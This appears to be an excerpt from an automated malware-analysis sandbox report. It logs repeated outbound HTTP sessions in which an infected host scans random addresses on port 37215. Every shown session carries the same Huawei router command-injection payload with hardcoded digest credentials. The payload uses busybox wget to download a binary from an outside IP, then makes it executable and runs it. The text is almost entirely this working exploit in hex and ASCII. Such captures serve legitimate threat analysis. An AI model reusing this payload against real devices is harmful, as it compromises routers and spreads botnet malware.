                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1143192.168.2.1554176122.193.85.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931544065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1144192.168.2.1555470138.63.213.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931555033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1145192.168.2.1544428186.33.192.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931577921 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1146192.168.2.154635237.27.133.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931611061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1147192.168.2.155395637.56.159.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931611061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1148192.168.2.1559720186.51.56.9637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931626081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1149192.168.2.154644437.192.31.25537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931803942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1150192.168.2.1544220157.70.1.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931813955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1151192.168.2.1546968156.160.121.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931866884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1152192.168.2.155133031.24.12.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.932501078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
